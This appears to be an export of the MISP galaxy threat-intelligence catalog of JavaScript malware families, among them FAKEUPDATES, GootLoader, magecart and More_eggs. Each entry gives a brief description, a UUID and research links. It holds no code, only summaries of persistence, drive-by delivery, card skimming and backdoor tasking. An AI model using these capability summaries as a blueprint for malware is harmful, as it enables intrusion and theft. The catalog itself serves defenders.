- https://securityscorecard.com/blog/the-job-offer-that-wasnt-how-we-stopped-an-espionage-plot - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BELLHOP
BELLHOP is a JavaScript backdoor interpreted using the native Windows Scripting Host (WSH). After performing some basic host information gathering, the BELLHOP dropper downloads a base64-encoded blob of JavaScript to disk and sets up persistence in three ways:
- Creating a Run key in the Registry
- Creating a RunOnce key in the Registry
- Creating a persistent named scheduled task
BELLHOP communicates using HTTP and HTTPS with primarily benign sites such as Google Docs and PasteBin.
Internal MISP references
UUID 7ebeb691-b979-4a88-94e1-dade780c6a7f
which can be used as unique global reference for BELLHOP
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop - webarchive
- https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CACTUSTORCH
According to the GitHub repo, CACTUSTORCH is a JavaScript and VBScript shellcode launcher. It will spawn a 32 bit version of the binary specified and inject shellcode into it.
Internal MISP references
UUID efbb5a7c-8c01-4aca-ac21-8dd614b256f7
which can be used as unique global reference for CACTUSTORCH
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch - webarchive
- https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/ - webarchive
- https://www.codercto.com/a/46729.html - webarchive
- https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf - webarchive
- https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/ - webarchive
- https://www.macnica.net/file/mpression_automobile.pdf - webarchive
- https://github.com/mdsecactivebreach/CACTUSTORCH - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ChromeBack
GoSecure describes ChromeBack as a browser hijacker, redirecting traffic and serving advertisements to users.
Internal MISP references
UUID ec055670-4d25-4918-90c7-281fddf3a771
which can be used as unique global reference for ChromeBack
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ClearFake
ClearFake is a malicious JavaScript framework deployed on compromised websites to deliver further malware using the drive-by download technique. The malware leverages social engineering to trick the user into running a fake web browser update.
Internal MISP references
UUID 8899bc6f-62e1-4732-988a-d5d64a5cf9bd
which can be used as unique global reference for ClearFake
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.clearfake - webarchive
- https://www.kroll.com/en/insights/publications/cyber/clearfake-update-tricks-victim-executing-malicious-powershell-code - webarchive
- https://rmceoin.github.io/malware-analysis/clearfake/ - webarchive
- https://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryptoNight
WebAssembly-based crypto miner.
Internal MISP references
UUID faa19699-a884-4cd3-a307-36492c8ee77a
which can be used as unique global reference for CryptoNight
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CukieGrab
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CukieGrab.
Known Synonyms |
---|
Roblox Trade Assist |
Internal MISP references
UUID d47ca107-3e03-4c25-88f9-8156426b7f60
which can be used as unique global reference for CukieGrab
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkWatchman
Prevailion found this RAT written in JavaScript, which dynamically compiles an accompanying keylogger written in C# and uses a DGA for C&C.
Internal MISP references
UUID 4baf5a22-7eec-4ad8-8780-23a351d9b5f5
which can be used as unique global reference for DarkWatchman
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.darkwatchman - webarchive
- https://securityintelligence.com/x-force/new-hive0117-phishing-campaign-imitates-conscription-summons-deliver-darkwatchman-malware/ - webarchive
- https://www.prevailion.com/darkwatchman-new-fileness-techniques/ - webarchive
- https://securityintelligence.com/posts/hive00117-fileless-malware-delivery-eastern-europe/ - webarchive
- https://cyble.com/blog/sophisticated-darkwatchman-rat-spreads-through-phishing-sites/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DNSRat
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DNSRat.
Known Synonyms |
---|
DNSbot |
Internal MISP references
UUID a4b40d48-e40b-47f2-8e30-72342231503e
which can be used as unique global reference for DNSRat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
doenerium
Open-source JavaScript info stealer with the capability to steal crypto wallets, passwords and cookies and to modify Discord clients: https://github.com/doener2323/doenerium
Internal MISP references
UUID dc446dbc-6f8a-48ee-9e90-10e679a003e1
which can be used as unique global reference for doenerium
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Enrume
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Enrume.
Known Synonyms |
---|
Ransom32 |
Internal MISP references
UUID d6e5f6b7-cafb-476d-958c-72debdabe013
which can be used as unique global reference for Enrume
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EVILNUM (Javascript)
According to Proofpoint, EvilNum is a backdoor that can be used for data theft or to load additional payloads. The malware includes multiple interesting components to evade detection and modify infection paths based on identified antivirus software.
Internal MISP references
UUID b7deec7e-24f7-4f78-9d58-9b3c1e182ab3
which can be used as unique global reference for EVILNUM (Javascript)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.evilnum - webarchive
- http://blog.nsfocus.net/agentvxapt-evilnum/ - webarchive
- https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw - webarchive
- https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets - webarchive
- https://github.com/eset/malware-ioc/tree/master/evilnum - webarchive
- https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html - webarchive
- https://securelist.com/deathstalker-mercenary-triumvirate/98177/ - webarchive
- http://www.pwncode.io/2018/05/javascript-based-bot-using-github-c.html - webarchive
- https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf - webarchive
- https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/ - webarchive
- https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/ - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FakeUpdateRU
FakeUpdateRU is a malicious JavaScript code injected into compromised websites to deliver further malware using the drive-by download technique. The malicious code displays a copy of the Google Chrome web browser download page and redirects the user to the download of a next-stage payload.
Internal MISP references
UUID 9106e280-febe-45a3-9cd1-cbffafc0c85b
which can be used as unique global reference for FakeUpdateRU
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FAKEUPDATES
FAKEUPDATES is a downloader written in JavaScript that communicates via HTTP. Supported payload types include executables and JavaScript. It writes the payloads to disk prior to launching them. FAKEUPDATES has led to further compromise via additional malware families that include CHTHONIC, DRIDEX, EMPIRE, KOADIC, DOPPELPAYMER, and AZORULT.
FAKEUPDATES has been heavily used by UNC1543, a financially motivated group.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FAKEUPDATES.
Known Synonyms |
---|
FakeUpdate |
SocGholish |
Internal MISP references
UUID cff35ce3-8d6f-417b-ae6c-a9e6a60ee26c
which can be used as unique global reference for FAKEUPDATES
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.fakeupdates - webarchive
- https://blog.sucuri.net/2022/08/socgholish-5-years-of-massive-website-infections.html - webarchive
- https://experience.mandiant.com/trending-evil/p/1 - webarchive
- https://www.digitalinformationworld.com/2022/04/threatening-redirect-web-service.html - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt - webarchive
- https://www.sentinelone.com/labs/socgholish-diversifies-and-expands-its-malware-staging-infrastructure-to-counter-defenders/ - webarchive
- https://malasada.tech/the-landupdate808-fake-update-variant/ - webarchive
- https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/ - webarchive
- https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/ - webarchive
- https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions - webarchive
- https://x.com/GenThreatLabs/status/1840762181668741130 - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/06/makemoney-malvertising-campaign-adds-fake-update-template/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.mandiant.com/resources/they-come-in-the-night-ransomware-deployment-trends - webarchive
- https://www.menlosecurity.com/blog/increase-in-attack-socgholish - webarchive
- https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/ - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems - webarchive
- https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html - webarchive
- https://killingthebear.jorgetesta.tech/actors/evil-corp - webarchive
- https://www.intrinsec.com/wp-content/uploads/2024/04/TLP-CLEAR-Matanbuchus-Co-Code-Emulation-and-Cybercrime-Infrastructure-Discovery-1.pdf - webarchive
- https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf - webarchive
- https://twitter.com/MsftSecIntel/status/1522690116979855360 - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta569-socgholish-and-beyond - webarchive
- https://www.lac.co.jp/lacwatch/report/20220407_002923.html - webarchive
- https://expel.io/blog/incident-report-spotting-socgholish-wordpress-injection/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/ - webarchive
- https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm - webarchive
- https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - webarchive
- https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GootLoader
According to PCrisk, GootLoader was discovered while examining legitimate but compromised websites (mainly sites running WordPress). GootLoader is used to infect computers with additional malware: its operators trick users into downloading and executing it by disguising it as a document or other file.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GootLoader.
Known Synonyms |
---|
SLOWPOUR |
Internal MISP references
UUID 5b2569e5-aeb2-4708-889f-c6d598bd5e14
which can be used as unique global reference for GootLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.gootloader - webarchive
- https://malasada.tech/gootloader-isnt-broken/ - webarchive
- https://gootloader.wordpress.com/2024/02/14/my-game-retired-latest-changes-to-gootloader/ - webarchive
- https://www.reliaquest.com/blog/gootloader-infection-credential-access/ - webarchive
- https://intel471.com/blog/threat-hunting-case-study-tracking-down-gootloader - webarchive
- https://x.com/MsftSecIntel/status/1836456406276342215 - webarchive
- https://experience.mandiant.com/trending-evil/p/1 - webarchive
- https://dinohacks.blogspot.com/2022/06/loading-gootloader.html - webarchive
- https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/ - webarchive
- https://www.esentire.com/blog/gootloader-leads-to-cobalt-strike-and-hand-on-keyboard-activity - webarchive
- https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ - webarchive
- https://blogs.blackberry.com/en/2022/07/gootloader-from-seo-poisoning-to-multi-stage-downloader - webarchive
- https://github.com/struppigel/hedgehog-tools/tree/main/gootloader - webarchive
- https://www.kroll.com/en/insights/publications/cyber/deep-dive-gootloader-malware-infection-chain - webarchive
- https://threatresearch.ext.hp.com/tips-for-automating-ioc-extraction-from-gootloader-a-changing-javascript-malware/ - webarchive
- https://labs.sentinelone.com/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/ - webarchive
- https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html - webarchive
- https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf - webarchive
- https://gootloader.wordpress.com/2024/06/24/gootloaders-new-hideout-revealed-the-malware-hunt-in-wordpress-shadows/ - webarchive
- https://www.esentire.com/blog/gootloader-striking-with-a-new-infection-technique - webarchive
- https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations - webarchive
- https://redcanary.com/blog/gootloader - webarchive
- https://web.archive.org/web/20230209123148/https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf - webarchive
- https://securityintelligence.com/x-force/gootbot-gootloaders-new-approach-to-post-exploitation/ - webarchive
- https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/gootloader-why-your-legal-document-search-may-end-in-misery/ - webarchive
- https://socradar.io/new-gootloader-variant-gootbot-changes-the-game-in-malware-tactics/ - webarchive
- https://gootloader.wordpress.com/2023/01/05/gootloader-command-control/ - webarchive
- https://gootloader.wordpress.com/2023/01/05/what-is-gootloader/ - webarchive
- https://news.sophos.com/en-us/2024/11/06/bengal-cat-lovers-in-australia-get-psspsspssd-in-google-driven-gootloader-campaign/ - webarchive
- https://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/ - webarchive
- https://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Detecting-GOOTLOADER-with-Google-Security/ba-p/823766 - webarchive
- https://community.riskiq.com/article/f5d5ed38 - webarchive
- https://www.esentire.com/web-native-pages/gootloader-unloaded - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
grelos
grelos is a skimmer used for magecart-style attacks.
Internal MISP references
UUID 79580c0b-c390-4421-976a-629a5c11af95
which can be used as unique global reference for grelos
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Griffon
GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Griffon.
Known Synonyms |
---|
Harpy |
Internal MISP references
UUID 85c25380-69d7-4d7e-b279-6b6791fd40bd
which can be used as unique global reference for Griffon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/ - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/ - webarchive
- https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-niagara - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/ - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.mandiant.com/resources/evolution-of-fin7 - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout - webarchive
- https://twitter.com/ItsReallyNick/status/1059898708286939136 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
inter
Internal MISP references
UUID 36b0f1a0-29a4-4ec5-bca2-18a241881d49
which can be used as unique global reference for inter
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Jeniva
Internal MISP references
UUID b0631a44-3264-429d-b8bc-3a27e27be305
which can be used as unique global reference for Jeniva
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Jetriz
Internal MISP references
UUID 9e6a0a54-8b55-4e78-a3aa-15d1946882e1
which can be used as unique global reference for Jetriz
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
jspRAT
Internal MISP references
UUID 71903afc-7129-4821-90e5-c490e4902de3
which can be used as unique global reference for jspRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KopiLuwak
Internal MISP references
UUID 2269d37b-87e9-460d-b878-b74a2f4c3537
which can be used as unique global reference for KopiLuwak
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak - webarchive
- https://securelist.com/shedding-skin-turlas-fresh-faces/88069/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack - webarchive
- https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/ - webarchive
- https://www.mandiant.com/resources/blog/turla-galaxy-opportunity - webarchive
- https://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html - webarchive
- https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LNKR
The LNKR trojan is a malicious browser extension that monitors the websites visited by the user, looking for pages on which the user holds administrative privileges, such as blog sites or web-based virtual learning environments. When the administrative user posts to such a page, the infected extension executes a stored cross-site scripting attack, injecting malicious JavaScript into the legitimate HTML of the page. The injected script is then used to redirect the site's other visitors to both benign and malicious domains.
Internal MISP references
UUID 1a85acf3-4bda-49b4-9e50-1231f0b7340a
which can be used as unique global reference for LNKR
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.lnkr - webarchive
- https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/ - webarchive
- https://www.riskiq.com/blog/labs/lnkr-browser-extension/ - webarchive
- https://github.com/Zenexer/lnkr/blob/master/recon/extensions/fanagokoaogopceablgmpndejhedkjjb/README.md - webarchive
- https://github.com/Zenexer/lnkr - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
magecart
Magecart is a malware framework intended to steal credit card information from compromised e-commerce websites. Used in criminal activities, it is a sophisticated implant built on top of relays, command-and-control servers and anonymizers. The first stage is typically implemented in JavaScript included in a compromised checkout page. It copies data from the page's input fields and sends it to a relay, which collects cards from a subset of compromised shops and forwards them to the command-and-control servers.
Internal MISP references
UUID f53e404b-0dcd-4116-91dd-cad94fc41936
which can be used as unique global reference for magecart
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart - webarchive
- https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html - webarchive
- https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218 - webarchive
- https://www.zscaler.com/blogs/security-research/black-friday-scams-4-emerging-skimming-attacks-watch-holiday-season - webarchive
- https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/ - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.riskiq.com/blog/labs/magecart-group-12-olympics/ - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2021/09/the-many-tentacles-of-magecart-group-8/ - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2021/11/credit-card-skimmer-evades-virtual-machines/ - webarchive
- https://community.riskiq.com/article/5bea32aa - webarchive
- https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf - webarchive
- https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html - webarchive
- https://www.reflectiz.com/the-gocgle-web-skimming-campaign/ - webarchive
- https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/ - webarchive
- https://scotthelme.co.uk/introducing-script-watch-detect-magecart-style-attacks-fast/?utm_source=dlvr.it&utm_medium=twitter - webarchive
- https://www.riskiq.com/blog/labs/magecart-nutribullet/ - webarchive
- https://community.riskiq.com/article/30f22a00 - webarchive
- https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/ - webarchive
- https://sansec.io/research/magecart-corona-lockdown - webarchive
- https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/ - webarchive
- https://sansec.io/research/magento-2-persistent-parasite - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/ - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://www.goggleheadedhacker.com/blog/post/14 - webarchive
- https://geminiadvisory.io/magecart-google-tag-manager/ - webarchive
- https://maxkersten.nl/2020/02/24/closing-in-on-magecart-12/ - webarchive
- https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/ - webarchive
- https://twitter.com/AffableKraut/status/1415425132080816133?s=20 - webarchive
- https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/ - webarchive
- https://marcoramilli.com/2020/02/19/uncovering-new-magecart-implant-attacking-ecommerce/ - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/ - webarchive
- https://community.riskiq.com/article/743ea75b/description - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0719.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/ - webarchive
- https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/ - webarchive
- https://geminiadvisory.io/wp-content/uploads/2020/07/Appendix-C-1.pdf - webarchive
- https://community.riskiq.com/article/fda1f967 - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/injecting-magecart-into-magento-global-config/ - webarchive
- https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/ - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/ - webarchive
- https://blog.malwarebytes.com/cybercrime/2021/06/lil-skimmer-the-magecart-impersonator/ - webarchive
- https://community.riskiq.com/article/017cf2e6 - webarchive
- https://www.zdnet.com/article/web-skimmers-found-on-the-websites-of-intersport-claires-and-icing/ - webarchive
- https://twitter.com/MBThreatIntel/status/1416101496022724609 - webarchive
- https://community.riskiq.com/article/2efc2782 - webarchive
- https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/ - webarchive
- https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/ - webarchive
- https://www.riskiq.com/blog/labs/magecart-medialand/ - webarchive
- https://community.riskiq.com/article/14924d61 - webarchive
- https://sansec.io/research/north-korea-magecart - webarchive
- https://blog.sucuri.net/2021/07/magecart-swiper-uses-unorthodox-concatenation.html - webarchive
- https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/ - webarchive
- https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html - webarchive
- https://twitter.com/AffableKraut/status/1385030485676544001 - webarchive
- https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
megaMedusa
MegaMedusa is a Node.js Layer-7 DDoS tool provided by the RipperSec team.
Internal MISP references
UUID 8a51e636-13be-4bdc-a32f-2d832263ba5b
which can be used as unique global reference for megaMedusa
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MiniJS
MiniJS is a very simple JavaScript-based first-stage backdoor. The backdoor is probably distributed via spearphishing email. Due to infrastructure overlap, the malware can be attributed to the actor Turla. Comparable JavaScript-based backdoor families of the actor are KopiLuwak and IcedCoffee.
Internal MISP references
UUID 5fd2f4f0-0591-45bb-a843-c194d5e294cd
which can be used as unique global reference for MiniJS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MintsLoader
According to Orange Cyberdefense, MintsLoader is a little-known, multi-stage malware loader that has been used since at least February 2023. It was observed in widespread distribution campaigns between July and October 2024. The name comes from its very characteristic URL parameter "1.php?s=mintsXX" (with XX being numbers).
MintsLoader primarily delivers RAT or infostealer payloads such as AsyncRAT and Vidar through phishing emails, targeting organizations in Europe (Spain, Italy, Poland, etc.). Written in JavaScript and PowerShell, MintsLoader operates through a multi-step infection process involving several URLs and domains, most of which are generated by a domain generation algorithm (DGA) under the .top TLD.
Internal MISP references
UUID 0cd219f4-1f3b-4958-b678-173257abd67e
which can be used as unique global reference for MintsLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
More_eggs
More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:
- d&exec = download and execute PE file
- gtfo = delete files/startup entries and terminate
- more_eggs = download additional/new scripts
- more_onion = run new script and terminate current script
- more_power = run command shell commands
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular More_eggs.
Known Synonyms |
---|
SKID |
SpicyOmelette |
Internal MISP references
UUID 1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f
which can be used as unique global reference for More_eggs
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs - webarchive
- https://github.com/eset/malware-ioc/tree/master/evilnum - webarchive
- https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers - webarchive
- https://asert.arbornetworks.com/double-the-infection-double-the-fun/ - webarchive
- https://www.esentire.com/web-native-pages/unmasking-venom-spider - webarchive
- https://twitter.com/Arkbird_SOLG/status/1301536930069278727 - webarchive
- https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/ - webarchive
- https://thehackernews.com/2024/06/moreeggs-malware-disguised-as-resumes.html - webarchive
- https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html - webarchive
- https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-kingswood - webarchive
- https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/ - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf - webarchive
